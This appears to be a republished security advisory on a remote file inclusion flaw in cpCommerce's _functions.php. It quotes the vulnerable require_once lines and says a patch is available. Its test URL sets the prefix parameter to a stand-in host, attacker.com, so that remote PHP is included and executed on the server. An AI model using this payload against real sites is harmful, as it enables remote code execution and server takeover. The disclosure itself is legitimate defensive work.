|
|
| |
| cpCommerce is "an open-source e-commerce solution that is entirely template and module based". A vulnerability in the product allows remote attackers to cause the product to include arbitrary PHP files and execute them. |
| |
Credit:
The original advisory can be downloaded from: http://www.zone-h.org/en/advisories/read/id=3284/.
The information has been provided by Astharot.
|
| |
There is a file inclusion vulnerability in the _functions.php file, line 13-14:
require_once("{$prefix}_config.php");
require_once("{$prefix}_gateways.php");
Is it possible for a remote attacker to include an external file and execute arbitrary commands with the privileges of the web server (nobody by default).
To test the vulnerability try this:
http://www.vulnsite.com/path_of_cpcommerce/_functions.php?prefix=http://www.attacker.com/index
In this way, the file "http://www.attacker.com/index_config.php" or "http://www.attacker.com/index_gateways.php" will be included and executed on the server.
Solution:
The author has been contacted and has published a temporary fix in the cpCommerce website forum, waiting for the new version.
The patch is available here: http://cpcommerce.org/forums/index.php?board=2;action=display;threadid=864.
|
|
|
